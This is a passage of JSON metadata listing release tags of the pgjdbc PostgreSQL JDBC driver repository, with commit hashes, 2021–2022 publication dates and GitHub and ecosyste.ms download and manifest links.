dbc/tar.gz/REL42.5.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1/manifests"},{"name":"REL42.4.3","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T14:02:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3/manifests"},{"name":"REL42.4.3-rc1","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T13:58:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1/manifests"},{"name":"REL42.3.8","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:47:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8/manifests"},{"name":"REL42.3.8-rc1","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:37:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1/manifests"},{"name":"REL42.2.27","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:33:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27/manifests"},{"name":"REL42.2.27-rc1","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:30:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1/manifests"},{"name":"REL42.3.7","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:53:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7/manifests"},{"name":"REL42.3.7-rc1","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:43:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1/manifests"},{"name":"REL42.5.0","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:25:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0/manifests"},{"name":"REL42.5.0-rc1","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:11:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1/manifests"},{"name":"REL42.4.2","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:39:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2/manifests"},{"name":"REL42.4.2-rc1","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:22:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1/manifests"},{"name":"REL42.2.26","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:21:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26/manifests"},{"name":"REL42.2.26-rc2","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:20:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2/manifests"},{"name":"REL42.2.26-rc1","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:16:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1/manifests"},{"name":"REL42.4.1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T13:14:28.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1/manifests"},{"name":"REL42.4.1-rc1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T12:58:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1/manifests"},{"name":"REL42.4.0","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T15:58:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0/manifests"},{"name":"REL42.4.0-rc1","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T14:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1/manifests"},{"name":"REL42.3.6","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:19:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6/manifests"},{"name":"REL42.3.6-rc1","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:11:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1/manifests"},{"name":"REL42.3.5","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T15:41:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5/manifests"},{"name":"REL42.3.5-rc1","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T14:50:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1/manifests"},{"name":"REL42.3.4","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:48:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4/manifests"},{"name":"REL42.3.4-rc1","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1/manifests"},{"name":"REL42.3.3","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:24:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3/manifests"},{"name":"REL42.3.3-rc1","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:07:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1/manifests"},{"name":"REL42.2.25","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:20:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25/manifests"},{"name":"REL42.2.25-rc1","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:17:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1/manifests"},{"name":"REL42.3.2-rc2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"tag","published_at":"2022-02-01T14:52:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2/manifests"},{"name":"REL42.3.2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"commit","published_at":"2022-02-01T14:47:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2/manifests"},{"name":"REL42.3.2-rc1","sha":"cfc4b1106b8f4931dee8241671c3880f5f947727","kind":"tag","published_at":"2022-01-31T19:31:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc1/manifests"},{"name":"REL42.3.1","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:23:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1/manifests"},{"name":"REL42.3.1-rc2","sha":"3cf846e019767590cc1a4c1b90246ebc26bc5130","kind":"tag","published_at":"2021-10-29T17:18:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc2/manifests"},{"name":"REL42.3.1-rc1","sha":"b3050e60f81b4e43fae452bcf6df297df2048ae4","kind":"tag","published_at":"2021-10-28T16:27:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.1-rc1/manifests"},{"name":"REL42.3.0","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-18T15:17:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0/manifests"},{"name":"REL42.3.0-rc2","sha":"6d93eb817f334b383d2c8716a50d8c1255e24236","kind":"tag","published_at":"2021-10-15T12:59:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.0-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.0-rc2/manifests"},{"name":"REL42.2.24","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:15:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24/manifests"},{"name":"REL42.2.24-rc2","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:05:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc2/manifests"},{"name":"REL42.2.24-rc1","sha":"512799b4aa5efe08247ff46fd128963f07483cf5","kind":"tag","published_at":"2021-09-23T11:02:30.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.24-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.24-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.24-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.24-rc1/manifests"},{"name":"REL42.2.23","sha":"d985dc19945dce93e09863b44118896927ef6d1f","kind":"tag","published_at":"2021-07-06T15:41:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.23","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.23","dependencies_parsed_at":null,"dependenc